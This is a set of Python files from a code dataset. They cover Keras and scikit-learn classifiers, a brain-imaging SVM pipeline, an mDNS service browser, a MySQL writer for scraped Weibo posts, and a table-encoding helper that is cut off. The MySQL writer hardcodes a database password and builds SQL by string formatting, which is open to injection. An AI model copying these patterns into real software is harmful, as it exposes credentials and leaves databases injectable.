json\nimport keras.models\nfrom keras.applications.inception_v3 import InceptionV3\nfrom keras.utils import np_utils\nfrom sklearn.cross_validation import train_test_split\nimport matplotlib.pyplot as plt\nfrom glob import glob\nfrom keras.callbacks import ReduceLROnPlateau, EarlyStopping\nfrom keras.layers import Dense, Dropout, Activation, Flatten, Input\nfrom keras.layers import Convolution2D, MaxPooling2D, ZeroPadding2D, GlobalAveragePooling2D, AveragePooling2D\nfrom keras.layers.normalization import BatchNormalization\nfrom keras.models import Sequential, Model\nfrom keras.optimizers import Adam, SGD\nfrom keras.applications.vgg16 import VGG16\nfrom PIL import Image\nfrom keras import regularizers\nfrom keras.callbacks import ModelCheckpoint, CSVLogger\n\nsize_image = 96\ndata = {}\ndata['data'] = []\n\npaths = 'food/train'\n\n\ndef getSum(path):\n sum = 0\n for d in os.listdir(path):\n num = len(os.listdir(os.path.join(path, d)))\n sum += num\n return sum\n\n\nsum = getSum(paths)\nY_all = np.zeros(sum)\nX_all = np.zeros((sum, size_image, size_image, 3), dtype='float64')\n\n\ndef init(path):\n count_X = 0\n label = 0\n\n for d in os.listdir(path):\n if os.path.isdir(os.path.join(path, d)):\n for img in os.listdir(os.path.join(path, d)):\n if img.endswith(\"jpg\"):\n image = Image.open(os.path.join(os.path.join(path, d), img))\n image = image.resize((size_image, size_image), Image.ANTIALIAS)\n image = np.array(image)\n X_all[count_X] = image\n Y_all[count_X] = label\n count_X += 1\n\n data['data'].append({\n 'id': label,\n 'name': d\n })\n label += 1\n with open('data_incep.txt', 'w') as outfile:\n json.dump(data, outfile)\n\n\ndef models():\n model = Sequential()\n model.add(Convolution2D(64, (3, 3), activation='relu', input_shape=(size_image, size_image, 3)))\n model.add(Convolution2D(64, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Convolution2D(128, (3, 3)))\n model.add(Activation('relu'))\n model.add(Convolution2D(128, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Convolution2D(256, (3, 3)))\n model.add(Activation('relu'))\n model.add(Convolution2D(256, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Convolution2D(512, (3, 3)))\n model.add(Activation('relu'))\n model.add(Convolution2D(512, (3, 3)))\n model.add(Activation('relu'))\n model.add(MaxPooling2D(pool_size=(2, 2)))\n\n model.add(Flatten())\n model.add(Dense(512, activation='relu',\n kernel_regularizer=regularizers.l2(0.01),\n ))\n model.add(Dropout(0.5))\n\n model.add(Dense(sum_laber, activation='softmax'))\n\n return model\n\n\n#\nif __name__ == '__main__':\n init(paths)\n sum_laber = len(os.listdir(paths))\n\n Y_all = np_utils.to_categorical(Y_all, sum_laber)\n X_all /= 255.0\n\n X_train, X_test, Y_train, Y_test = train_test_split(X_all, Y_all, test_size=0.2, random_state=42)\n\n datagen = ImageDataGenerator(\n featurewise_center=False, # set input mean to 0 over the dataset\n samplewise_center=False, # set each sample mean to 0\n featurewise_std_normalization=False, # divide inputs by std of the dataset\n samplewise_std_normalization=False, # divide each input by its std\n zca_whitening=False, # apply ZCA whitening\n rotation_range=10, # randomly rotate images in the range (degrees, 0 to 180)\n width_shift_range=0.125, # randomly shift images horizontally (fraction of total width)\n height_shift_range=0.125, # randomly shift images vertically (fraction of total height)\n horizontal_flip=True, # randomly flip images\n vertical_flip=False, # randomly flip images\n # rescale=1. / 255,\n fill_mode='nearest')\n datagen.fit(X_train)\n\n # generator = datagen.flow(X_train, Y_train, batch_size=32)\n # val_generator = datagen.flow(X_test, Y_test, batch_size=32)\n\n base_model = InceptionV3(weights='imagenet', include_top=False, input_tensor=Input(shape=(96, 96, 3)))\n x = base_model.output\n x = GlobalAveragePooling2D()(x)\n # # x = Flatten()(x)\n x = Dense(4096)(x)\n x = BatchNormalization()(x)\n x = Activation('relu')(x)\n x = Dropout(.5)(x)\n predictions = Dense(sum_laber, activation='softmax')(x)\n\n model = Model(input=base_model.input, output=predictions)\n # model = VGG16()\n\n for layer in model.layers[:172]:\n layer.trainable = False\n for layer in model.layers[172:]:\n layer.trainable = True\n\n model.compile(optimizer=SGD(lr=0.01, momentum=0.9),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\n\n checkpointer = ModelCheckpoint(filepath='models_incep.h5', verbose=1, save_best_only=True)\n csv_logger = CSVLogger('train_incep.csv')\n\n model.fit_generator(datagen.flow(X_train, Y_train, batch_size=32),\n steps_per_epoch=X_train.shape[0] / 32,\n validation_data=datagen.flow(X_test, Y_test, batch_size=32),\n epochs=50,\n callbacks=[checkpointer, csv_logger],\n validation_steps=Y_train.shape[0] / 32,\n )\n\n score = model.evaluate(X_test, Y_test, verbose=1)\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"InceptionV3.py","file_name":"InceptionV3.py","file_ext":"py","file_size_in_byte":5695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"71418029","text":"import pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport csv\n\n# inputdata\ndataset = pd.read_excel(\"Data.xlsx\", index_col=0) # index_col for removing the data from dataset\n\ndummy = pd.get_dummies(dataset['Gender'])\nprint(dummy)\ndataset1 = pd.concat((dataset, dummy), axis=1)\ndataset1 = dataset1.drop(['Gender', 'female'], axis=1)\ndataset1 = dataset1.rename(columns={\"male\": \"sex\"})\n\ndummy1 = pd.get_dummies(dataset['corona_result'])\nprint(dummy1)\ndataset2 = pd.concat((dataset1, dummy1), axis=1)\ndataset2 = dataset2.drop(['positive', 'corona_result'], axis=1)\ndataset2 = dataset2.rename(columns={\"negative\": \"Test_result\"})\n\nprint(dataset1)\nprint(dataset2)\n\n\n# caluclating values of means&varience\n\nfrom sklearn.preprocessing import StandardScaler\n\nscaler = StandardScaler()\n\nscaler.fit(dataset2.drop('Test_result', axis=1))\nscaled_features = scaler.transform(dataset2.drop('Test_result', axis=1))\ndataset_feat = pd.DataFrame(scaled_features, columns=dataset2.columns[:-1])\nprint(dataset_feat)\n\n# Train Test Split Data and Use KNN model from sklearn library\n\n\nfrom sklearn.model_selection import train_test_split\n\nX_train, X_test, y_train, y_test = train_test_split(scaled_features, dataset2['Test_result'], test_size=0.30)\n\n# Remember that we are trying to come up\n# with a model to predict whether\n# someone will TARGET CLASS or not.\n# We'll start with k = 1.\n\nfrom sklearn.neighbors import KNeighborsClassifier\n\nknn = KNeighborsClassifier(n_neighbors=3)\n\nknn.fit(X_train, y_train)\npred = knn.predict(X_test)\n\n# Predictions and Evaluations\n# Let's evaluate our KNN model !\nfrom sklearn.metrics import classification_report, confusion_matrix\n\nprint(confusion_matrix(y_test, pred))\n\nprint(classification_report(y_test, pred))\n\n# Choosing a K Value:\n\nerror_rate = []\n\n# Will take some time\nfor i in range(1, 6):\n knn = KNeighborsClassifier(n_neighbors=i)\n knn.fit(X_train, y_train)\n pred_i = knn.predict(X_test)\n error_rate.append(np.mean(pred_i != y_test))\n\nplt.figure(figsize=(10, 6))\nplt.plot(range(1, 6), error_rate, color='blue', linestyle='dashed', marker='o', markerfacecolor='green', markersize=20)\n\nplt.title('Error Rate vs. K Value')\nplt.xlabel('K')\nplt.ylabel('Error Rate')\nplt.show()\n\n# FIRST A QUICK COMPARISON TO OUR ORIGINAL K = 1\nknn = KNeighborsClassifier(n_neighbors=3)\n\nknn.fit(X_train, y_train)\npred = knn.predict(X_test)\n\nprint('WITH K = 3')\nprint('\\n')\nprint(confusion_matrix(y_test, pred))\nprint('\\n')\nprint(classification_report(y_test, pred))\n\n# NOW WITH K = 15\nknn = KNeighborsClassifier(n_neighbors=2)\n\nknn.fit(X_train, y_train)\npred = knn.predict(X_test)\n\nprint('WITH K = 2')\nprint('\\n')\nprint(confusion_matrix(y_test, pred))\nprint('\\n')\nprint(classification_report(y_test, pred))\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2763,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"439981110","text":"\n\nimport os\nimport json\nimport numpy as np\nfrom sklearn.cross_validation import StratifiedKFold\nimport nibabel\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.feature_selection import SelectKBest\nfrom parsimony.estimators import LogisticRegressionL1L2TV\nimport parsimony.functions.nesterov.tv as tv_helper\nimport brainomics.image_atlas\nimport parsimony.algorithms as algorithms\nimport parsimony.datasets as datasets\nimport parsimony.functions.nesterov.tv as nesterov_tv\nimport parsimony.estimators as estimators\nimport parsimony.algorithms as algorithms\nimport parsimony.utils as utils\nfrom scipy.stats import binom_test\nfrom collections import OrderedDict\nfrom sklearn import preprocessing\nfrom sklearn.metrics import roc_auc_score, recall_score\nfrom collections import OrderedDict\nimport pandas as pd\nimport shutil\nimport os\nimport json\nimport numpy as np\nfrom sklearn.cross_validation import StratifiedKFold\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom scipy.stats import binom_test\nfrom collections import OrderedDict\nfrom sklearn import preprocessing\nfrom sklearn.metrics import roc_auc_score\nfrom sklearn import svm\nfrom brainomics import array_utils\nimport mapreduce\nfrom sklearn.metrics import recall_score, roc_auc_score, precision_recall_fscore_support\nfrom statsmodels.stats.inter_rater import fleiss_kappa\n\n\nWD = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/results/learning_curve_centered_by_site_all/inter_site/ratio_0.6'\ndef config_filename(): return os.path.join(WD,\"config_dCV.json\")\ndef results_filename(): return os.path.join(WD,\"results_dCV.xlsx\")\n\nNFOLDS_OUTER = 4 #number of sites\nNFOLDS_INNER = 5\npenalty_start = 3\n#############################################################################\n\n\n\ndef load_globals(config):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n\n\ndef resample(config, resample_nb):\n import mapreduce as GLOBAL # access to global variables\n GLOBAL.DATA = GLOBAL.load_data(config[\"data\"])\n resample = config[\"resample\"][resample_nb]\n GLOBAL.DATA_RESAMPLED = {k: [GLOBAL.DATA[k][idx, ...] for idx in resample]\n for k in GLOBAL.DATA}\n\ndef mapper(key, output_collector):\n import mapreduce as GLOBAL\n Xtr = GLOBAL.DATA_RESAMPLED[\"X\"][0]\n Xte = GLOBAL.DATA_RESAMPLED[\"X\"][1]\n ytr = GLOBAL.DATA_RESAMPLED[\"y\"][0]\n yte = GLOBAL.DATA_RESAMPLED[\"y\"][1]\n\n\n c = float(key[0])\n print(\"c:%f\" % (c))\n\n class_weight=\"auto\" # unbiased\n\n mask = np.ones(Xtr.shape[0], dtype=bool)\n\n scaler = preprocessing.StandardScaler().fit(Xtr)\n Xtr = scaler.transform(Xtr)\n Xte=scaler.transform(Xte)\n\n mod = svm.LinearSVC(C=c,fit_intercept=False,class_weight= class_weight)\n\n mod.fit(Xtr, ytr.ravel())\n y_pred = mod.predict(Xte)\n y_proba_pred = mod.decision_function(Xte)\n ret = dict(y_pred=y_pred, y_true=yte,prob_pred = y_proba_pred, beta=mod.coef_, mask=mask)\n if output_collector:\n output_collector.collect(key, ret)\n else:\n return ret\n\ndef scores(key, paths, config):\n key_parts = key.split(\"_\")\n values = [mapreduce.OutputCollector(p) for p in paths]\n try:\n values = [item.load() for item in values]\n except Exception as e:\n print(e)\n return None\n\n y_true_splits = [item[\"y_true\"].ravel() for item in values]\n y_pred_splits = [item[\"y_pred\"].ravel() for item in values]\n y_true = np.concatenate(y_true_splits)\n y_pred = np.concatenate(y_pred_splits)\n prob_pred_splits = [item[\"prob_pred\"].ravel() for item in values]\n prob_pred = np.concatenate(prob_pred_splits)\n\n # Prediction performances\n p, r, f, s = precision_recall_fscore_support(y_true, y_pred, average=None)\n auc = roc_auc_score(y_true, prob_pred)\n\n # balanced accuracy (recall_mean)\n bacc_splits = [recall_score(y_true_splits[f], y_pred_splits[f], average=None).mean() for f in range(len(y_true_splits))]\n auc_splits = [roc_auc_score(y_true_splits[f], prob_pred_splits[f]) for f in range(len(y_true_splits))]\n\n print(\"bacc all - mean(bacc) %.3f\" % (r.mean() - np.mean(bacc_splits)))\n # P-values\n success = r * s\n success = success.astype('int')\n prob_class1 = np.count_nonzero(y_true) / float(len(y_true))\n pvalue_recall0_true_prob = binom_test(success[0], s[0], 1 - prob_class1,alternative = 'greater')\n pvalue_recall1_true_prob = binom_test(success[1], s[1], prob_class1,alternative = 'greater')\n pvalue_recall0_unknwon_prob = binom_test(success[0], s[0], 0.5,alternative = 'greater')\n pvalue_recall1_unknown_prob = binom_test(success[1], s[1], 0.5,alternative = 'greater')\n pvalue_bacc = binom_test(success[0]+success[1], s[0] + s[1], p=0.5,alternative = 'greater')\n\n\n # Beta's measures of similarity\n betas = np.hstack([item[\"beta\"][:, penalty_start:].T for item in values]).T\n # Correlation\n R = np.corrcoef(betas)\n R = R[np.triu_indices_from(R, 1)]\n # Fisher z-transformation / average\n z_bar = np.mean(1. / 2. * np.log((1 + R) / (1 - R)))\n # bracktransform\n r_bar = (np.exp(2 * z_bar) - 1) / (np.exp(2 * z_bar) + 1)\n\n # threshold betas to compute fleiss_kappa and DICE\n try:\n betas_t = np.vstack([\n array_utils.arr_threshold_from_norm2_ratio(betas[i, :], .99)[0]\n for i in range(betas.shape[0])])\n # Compute fleiss kappa statistics\n beta_signed = np.sign(betas_t)\n table = np.zeros((beta_signed.shape[1], 3))\n table[:, 0] = np.sum(beta_signed == 0, 0)\n table[:, 1] = np.sum(beta_signed == 1, 0)\n table[:, 2] = np.sum(beta_signed == -1, 0)\n fleiss_kappa_stat = fleiss_kappa(table)\n\n # Paire-wise Dice coeficient\n ij = [[i, j] for i in range(betas.shape[0]) for j in range(i+1, betas.shape[0])]\n dices = list()\n for idx in ij:\n A, B = beta_signed[idx[0], :], beta_signed[idx[1], :]\n dices.append(float(np.sum((A == B)[(A != 0) & (B != 0)])) / (np.sum(A != 0) + np.sum(B != 0)))\n dice_bar = np.mean(dices)\n except:\n dice_bar = fleiss_kappa_stat = 0\n\n # Proportion of selection within the support accross the CV\n support_count = (betas_t != 0).sum(axis=0)\n support_count = support_count[support_count > 0]\n support_prop = support_count / betas_t.shape[0]\n\n scores = OrderedDict()\n scores['key'] = key\n scores['recall_0'] = r[0]\n scores['recall_1'] = r[1]\n scores['bacc'] = r.mean()\n scores['bacc_se'] = np.std(bacc_splits) / np.sqrt(len(bacc_splits))\n scores[\"auc\"] = auc\n scores['auc_se'] = np.std(auc_splits) / np.sqrt(len(auc_splits))\n scores['pvalue_recall0_true_prob_one_sided'] = pvalue_recall0_true_prob\n scores['pvalue_recall1_true_prob_one_sided'] = pvalue_recall1_true_prob\n scores['pvalue_recall0_unknwon_prob_one_sided'] = pvalue_recall0_unknwon_prob\n scores['pvalue_recall1_unknown_prob_one_sided'] = pvalue_recall1_unknown_prob\n scores['pvalue_bacc_mean'] = pvalue_bacc\n scores['prop_non_zeros_mean'] = float(np.count_nonzero(betas_t)) / \\\n float(np.prod(betas.shape))\n scores['beta_r_bar'] = r_bar\n scores['beta_fleiss_kappa'] = fleiss_kappa_stat\n scores['beta_dice_bar'] = dice_bar\n scores['beta_dice'] = str(dices)\n scores['beta_r'] = str(R)\n scores['beta_support_prop_select_mean'] = support_prop.mean()\n scores['beta_support_prop_select_sd'] = support_prop.std()\n\n\n return scores\n\ndef reducer(key, values):\n import os, glob, pandas as pd\n os.chdir(os.path.dirname(config_filename()))\n config = json.load(open(config_filename()))\n paths = glob.glob(os.path.join(config['map_output'], \"*\", \"*\", \"*\"))\n #paths = [p for p in paths if not p.count(\"0.8_-1\")]\n\n def close(vec, val, tol=1e-4):\n return np.abs(vec - val) < tol\n\n def groupby_paths(paths, pos):\n groups = {g:[] for g in set([p.split(\"/\")[pos] for p in paths])}\n for p in paths:\n groups[p.split(\"/\")[pos]].append(p)\n return groups\n\n def argmaxscore_bygroup(data, groupby='fold', param_key=\"key\", score=\"bacc\"):\n arg_max_byfold = list()\n for fold, data_fold in data.groupby(groupby):\n# assert len(data_fold) == len(set(data_fold[param_key])) # ensure all param are diff\n arg_max_byfold.append([fold, data_fold.ix[data_fold[score].argmax()][param_key], data_fold[score].max()])\n return pd.DataFrame(arg_max_byfold, columns=[groupby, param_key, score])\n\n print('## Refit scores')\n print('## ------------')\n byparams = groupby_paths([p for p in paths if p.count(\"all\") and not p.count(\"all/all\")],3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n\n data = [list(byparams_scores[k].values()) for k in byparams_scores]\n\n columns = list(byparams_scores[list(byparams_scores.keys())[0]].keys())\n scores_refit = pd.DataFrame(data, columns=columns)\n\n print('## doublecv scores by outer-cv and by params')\n print('## -----------------------------------------')\n data = list()\n bycv = groupby_paths([p for p in paths if p.count(\"cvnested\")],1)\n for fold, paths_fold in bycv.items():\n print(fold)\n byparams = groupby_paths([p for p in paths_fold], 3)\n byparams_scores = {k:scores(k, v, config) for k, v in byparams.items()}\n data += [[fold] + list(byparams_scores[k].values()) for k in byparams_scores]\n scores_dcv_byparams = pd.DataFrame(data, columns=[\"fold\"] + columns)\n\n\n print('## Model selection')\n print('## ---------------')\n svm = argmaxscore_bygroup(scores_dcv_byparams); svm[\"method\"] = \"svm\"\n\n scores_argmax_byfold = svm\n\n print('## Apply best model on refited')\n print('## ---------------------------')\n scores_svm = scores(\"nestedcv\", [os.path.join(config['map_output'], row[\"fold\"], \"all\", row[\"key\"]) for index, row in svm.iterrows()], config)\n\n\n scores_cv = pd.DataFrame([[\"svm\"] + list(scores_svm.values())], columns=[\"method\"] + list(scores_svm.keys()))\n\n with pd.ExcelWriter(results_filename()) as writer:\n scores_refit.to_excel(writer, sheet_name='cv_by_param', index=False)\n scores_dcv_byparams.to_excel(writer, sheet_name='cv_cv_byparam', index=False)\n scores_argmax_byfold.to_excel(writer, sheet_name='cv_argmax', index=False)\n scores_cv.to_excel(writer, sheet_name='dcv', index=False)\n\n##############################################################################\n\nif __name__ == \"__main__\":\n INPUT_DATA_X = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/mean_centered_by_site_all/X.npy'\n INPUT_DATA_y = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/mean_centered_by_site_all/y.npy'\n INPUT_MASK_PATH = '/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/mean_centered_by_site_all/mask.npy'\n\n\n NFOLDS_OUTER = 4 # 4 datasets\n NFOLDS_INNER = 5\n\n site = np.load(\"/neurospin/brainomics/2016_schizConnect/analysis/all_studies+VIP/Freesurfer/all_subjects/data/site.npy\")\n\n\n\n shutil.copy(INPUT_DATA_X, WD)\n shutil.copy(INPUT_DATA_y, WD)\n shutil.copy(INPUT_MASK_PATH, WD)\n #############################################################################\n ## Create config file\n y = np.load(INPUT_DATA_y)\n\n cv_outer = [[tr, te] for tr,te in StratifiedKFold(y.ravel(), n_folds=NFOLDS_OUTER, random_state=42)]\n cv_outer[0][0] = np.transpose(np.where(site != 1)).ravel()\n cv_outer[0][1] = np.transpose(np.where(site == 1)).ravel() #CV00 TEST ON COBRE\n\n cv_outer[1][0] = np.transpose(np.where(site != 2)).ravel()\n cv_outer[1][1] = np.transpose(np.where(site == 2)).ravel() #CV01 TEST ON NMORPHch\n\n cv_outer[2][0] = np.transpose(np.where(site != 3)).ravel()\n cv_outer[2][1] = np.transpose(np.where(site == 3)).ravel() #CV02 TEST ON NUSDAST\n\n cv_outer[3][0] = np.transpose(np.where(site != 4)).ravel()\n cv_outer[3][1] = np.transpose(np.where(site == 4)).ravel() #CV03 TEST ON VIP\n\n\n cv_outer[0][0] = cv_outer[0][0][:int(np.around(len(cv_outer[0][0])*0.6))]\n cv_outer[1][0] = cv_outer[1][0][:int(np.around(len(cv_outer[1][0])*0.6))]\n cv_outer[2][0] = cv_outer[2][0][:int(np.around(len(cv_outer[2][0])*0.6))]\n cv_outer[3][0] = cv_outer[3][0][:int(np.around(len(cv_outer[3][0])*0.6))]\n\n import collections\n cv = collections.OrderedDict()\n for cv_outer_i, (tr_val, te) in enumerate(cv_outer):\n cv[\"cv%02d/all\" % (cv_outer_i)] = [tr_val, te]\n cv_inner = StratifiedKFold(y[tr_val].ravel(), n_folds=NFOLDS_INNER, random_state=42)\n for cv_inner_i, (tr, val) in enumerate(cv_inner):\n cv[\"cv%02d/cvnested%02d\" % ((cv_outer_i), cv_inner_i)] = [tr_val[tr], tr_val[val]]\n for k in cv:\n cv[k] = [cv[k][0].tolist(), cv[k][1].tolist()]\n\n\n C_range = [[100],[10],[1],[1e-1],[1e-2],[1e-3],[1e-4],[1e-5],[1e-6],[1e-7],[1e-8],[1e-9]]\n\n\n user_func_filename = \"/home/ad247405/git/scripts/2016_schizConnect/supervised_analysis/all_studies+VIP/all_subjects/Freesurfer/learning_curve_ratio_centered_by_site_all/inter_site/svm_ratio_0_6.py\"\n\n config = dict(data=dict(X=\"X.npy\", y=\"y.npy\"),\n params=C_range, resample=cv,\n structure=\"mask.npy\",\n map_output=\"model_selectionCV\",\n user_func=user_func_filename,\n reduce_input=\"results/*/*\",\n reduce_group_by=\"params\",\n reduce_output=\"model_selectionCV.csv\")\n json.dump(config, open(os.path.join(WD, \"config_dCV.json\"), \"w\"))\n\n\n # Build utils files: sync (push/pull) and PBS\n import brainomics.cluster_gabriel as clust_utils\n sync_push_filename, sync_pull_filename, WD_CLUSTER = \\\n clust_utils.gabriel_make_sync_data_files(WD)\n cmd = \"mapreduce.py --map %s/config_dCV.json\" % WD_CLUSTER\n clust_utils.gabriel_make_qsub_job_files(WD, cmd)\n","sub_path":"2016_schizConnect/supervised_analysis/all_studies+VIP/all_subjects/Freesurfer/learning_curve_ratio_centered_by_site_all/inter_site/svm_ratio_0_6.py","file_name":"svm_ratio_0_6.py","file_ext":"py","file_size_in_byte":14054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"161256436","text":"from zeroconf import ServiceBrowser, Zeroconf\nimport socket\nimport time\n\nTYPE = \"_mesh-http._tcp.local.\"\n\nclass ServiceListener(object):\n def __init__(self):\n self.ips = []\n self.props = []\n\n def remove_service(self, zeroconf, type, name):\n print(\"Service %s removed\" % (name,))\n\n def add_service(self, zeroconf, type, name):\n info = zeroconf.get_service_info(type, name)\n #print(\"Service %s added, service info: %s\" % (name, info))\n if(info):\n self.ips.append(socket.inet_ntoa(info.address)+':'+str(info.port))\n self.props.append(info.properties)\n\ndef getIps(timeout = 3):\n zc = Zeroconf()\n listener = ServiceListener()\n brower = ServiceBrowser(zc, TYPE, listener)\n time.sleep(timeout)\n zc.close()\n return (listener.ips, listener.props)\n\n\nif __name__ == '__main__':\n ip, prop = getIps()\n print(ip, prop)\n","sub_path":"mdns.py","file_name":"mdns.py","file_ext":"py","file_size_in_byte":902,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"57800049","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Author : pureoym\n# @Contact : pureoym@163.com\n# @TIME : 2018/9/29 16:18\n# @File : io_utils.py\n# Copyright 2017 pureoym. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ========================================================================\n\nimport pymysql\nfrom importlib import reload\nimport sys\nimport weibo_utils\n\n\ndef write_to_mysql(line, logger):\n conf = {'host': '10.10.65.231',\n 'user': 'ai',\n 'passwd': 'ai_123',\n 'db': 'AI',\n 'port': 3306, }\n conn = get_mysql_conn(conf, logger)\n import sys\n reload(sys)\n if line:\n record = weibo_utils.get_weibo_data_from_log(line)\n # print(record)\n try:\n # [weibo_id, weibo_url, contents, zan, transfer, comment, pics, publish_time, crawl_time, account_id, from_account_id, from_weibo_id]\n weibo_id = record[0]\n weibo_url = record[1]\n contents = record[2].replace('\\\"', '\\\\\"')\n zan = record[3]\n transfer = record[4]\n comment = record[5]\n pic_url = record[6]\n publish_time = record[7]\n crawl_time = record[8]\n account_id = record[9]\n from_account_id = record[10]\n from_weibo_id = record[11]\n sql = 'REPLACE INTO weibo_data(weibo_id, weibo_url, contents, zan, transfer, comment, pic_url, publish_time, crawl_time, account_id, from_account_id, from_weibo_id)' \\\n 'VALUES (\"%s\", \"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\",\"%s\")' \\\n % (weibo_id, weibo_url, contents, zan, transfer, comment, pic_url, publish_time, crawl_time,\n account_id, from_account_id, from_weibo_id)\n execute_my_sql(conn, sql, logger)\n logger.info('提交资源,微博ID=' + weibo_id)\n except Exception as e:\n logger.error(e)\n logger.error(record)\n\n\ndef get_mysql_conn(conf, logger):\n '''\n 建立mysql链接\n :param conf:\n :return:\n '''\n try:\n conn = pymysql.connect(host=conf['host'],\n user=conf['user'],\n passwd=conf['passwd'],\n db=conf['db'],\n port=conf['port'],\n charset=\"utf8\")\n # logger.debug('mysql connection established')\n except Exception as e:\n logger.error(e)\n sys.exit()\n return conn\n\n\ndef execute_my_sql(conn, sql, logger):\n '''\n 执行sql语句\n :param conn:\n :param sql:\n :return:\n '''\n cursor = conn.cursor()\n try:\n cursor.execute(sql)\n conn.commit()\n except pymysql.Error as e:\n conn.rollback()\n logger.error(e)\n\n\ndef execute_sql_and_get_result(conn, sql, logger):\n '''\n 执行sql语句\n :param conn:\n :param sql:\n :return:\n '''\n cursor = conn.cursor()\n try:\n cursor.execute(sql)\n conn.commit()\n return\n except pymysql.Error as e:\n conn.rollback()\n logger.error(e)","sub_path":"io_utils.py","file_name":"io_utils.py","file_ext":"py","file_size_in_byte":3636,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"577637182","text":"import itertools\nimport json\nimport os\nimport random\nfrom math import ceil\nfrom collections import defaultdict\nfrom pathlib import Path\nimport re\n\nimport torch\nfrom torch.utils.data import DataLoader, Dataset\n\nfrom table_bert import Table, Column, TableBertModel\n\n\n# html_pattern = re.compile(r'<\\w+ [^>]*>([^<]+)</\\w+>')\n# tag_pattern = re.compile(r'<.*?>')\n# link_pattern = re.compile(r'\\[.*?\\|.*?\\]')\n\n\n# def get_negative_rank(path=Path('.data/bench/1/rel0_rank'), threshold=0.0811):\n# rank_dict = {}\n# with open(path, 'r') as f:\n# lines = f.readlines()[:3200]\n# for line in lines:\n# qid, rel, tid, overlap_ratio = line.split('\\t')\n# if float(overlap_ratio) >= threshold:\n# try:\n# rank_dict[qid].append(tid)\n# except:\n# rank_dict[qid] = [tid]\n# return rank_dict\n\n\ndef encode_tables(table_json, is_slice, query, table_tokenizer, min_row):\n rel = table_json['rel']\n tid = table_json['table']['tid']\n\n raw_json = json.loads(table_json['table']['raw_json'])\n textBeforeTable = raw_json['textBeforeTable'] # 추후\n textAfterTable = raw_json['textAfterTable'] # 추후\n\n title = raw_json['pageTitle']\n # caption = re.sub(r'[^a-zA-Z0-9]', ' ', raw_json['title']).strip() # Caption 역할\n caption = raw_json['title'].strip() # Caption 역할\n tableOrientation = raw_json['tableOrientation'].strip() # [HORIZONTAL, VERTICAL]\n\n headerPosition = raw_json['headerPosition'] # ['FIRST_ROW', 'MIXED', 'FIRST_COLUMN', 'NONE’]\n hasHeader = raw_json['hasHeader'] # [true, false]\n keyColumnIndex = raw_json['keyColumnIndex']\n headerRowIndex = raw_json['headerRowIndex'] # 0 == 첫줄, -1 == 없음\n entities = raw_json['entities']\n\n body = raw_json['relation']\n if tableOrientation == \"HORIZONTAL\":\n body = list(map(list, zip(*body))) # transpose\n\n header = body[headerRowIndex] if hasHeader else [''] * len(body[0])\n # Heading preprocessing + link remove\n # heading_str = ' '.join(heading)\n # if html_pattern.search(heading_str):\n # if link_pattern.search(heading_str): # 같이 있는 경우\n # heading = [re.sub(tag_pattern, '', column).strip() for column in heading]\n # for idx, column in enumerate(heading):\n # if link_pattern.search(column):\n # real_text = link_pattern.search(column).group().split('|')[-1][:-1].strip()\n # heading[idx] = real_text\n # else:\n # heading = [re.sub(html_pattern, '', column).strip() for column in heading]\n\n # Row preporcessing + link remove\n # cell_sum_str = ''\n # for rows in body:\n # cell_sum_str += ' '.join(rows)\n # cell_sum_str = ' '.join([row for rows in body])\n\n # if html_pattern.search(cell_sum_str):\n # if link_pattern.search(cell_sum_str): # 같이 있으면\n # for i, rows in enumerate(body):\n # for j, cell in enumerate(rows):\n # if link_pattern.search(cell):\n # cell = re.sub(tag_pattern, '', cell).strip()\n # real_text = link_pattern.search(cell).group().split('|')[-1][:-1]\n # body[i][j] = real_text\n # else:\n # cell = re.sub(html_pattern, '', cell).strip()\n # body[i][j] = cell\n\n # else:\n # row_list = []\n # for rows in body:\n # row_list.append([re.sub(html_pattern, '', row).strip() for row in rows])\n # body = row_list\n\n # caption = caption if caption else title\n context = f'{title} {caption}'.strip()\n context_rep = table_tokenizer.tokenize(context)\n\n if is_slice:\n table_reps = slice_table(tid, header, body, table_tokenizer, min_row)\n else:\n table_reps = [Table(id=tid,\n header=[Column(h.strip(), infer_column_type(h)) for h in header],\n data=body\n ).tokenize(table_tokenizer)]\n\n # memory issues!\n if len(table_reps) > 5:# \n table_reps = table_reps[:5]\n\n return table_reps, context_rep\n\n\ndef slice_table(tid, heading, data, 